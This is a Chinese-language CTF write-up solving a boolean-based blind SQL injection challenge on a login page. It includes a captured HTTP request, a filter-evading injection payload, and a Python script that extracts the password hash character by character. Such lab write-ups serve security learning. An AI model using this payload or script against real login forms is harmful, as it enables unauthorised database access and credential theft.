前言
[CTF学习]基于布尔的SQL盲注
一、题目
提 示: 基于布尔的SQL盲注
描 述: sql注入
访问题目,又是一个web login登陆界面,根据提示可以大概猜测是一个sql post注入题。
二、解题步骤
1.bp抓包
POST /index.php HTTP/1.1
Host: 114.67.246.176:10965
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://114.67.246.176:10965/
Cookie: PHPSESSID=j4u9u18ei1r7serqv1vhg9km34
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
username=admin&password=123
#当username=admin时提示password error
#可知用户名为 admin
#对username进行注入时,发现<>=都被过滤了,不过or没有被过滤
#我这边使用username=a'or(1) or(0)%23 进行sql注入判断
#将用户名故意输错来获得回显判断
构造payload
username=admi'or((ascii(substr((select(password))from(1)))-48))%23&password=123
2、python脚本
import requests
import time
url = "http://pandarking.ctf:10965/index.php"
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE'
}
with requests.session() as s:
database = "passwd:"
s.keep_alive = False
s.adapters.DEFAULT_RETRIES = 5
for i in range(1,32):
for j in range(48,128):
sql = 'admi\'or((ascii(substr((select(password))from({0})))-{1}))--\''.format(i,j)
data = {'username':sql,'password':"123"}
try:
res = s.post(url,data=data,timeout=5,headers=headers)
except:
time.sleep(2)
res = s.post(url,data=data,timeout=5,headers=headers)
if 'username does not exist' in res.text:
database += chr(j)
print(database)
break
res.close()
#得到 passwd:4dcc88f8f1bc05e7c2ad1a60288481a
3、登陆后台得到flag
谢谢观看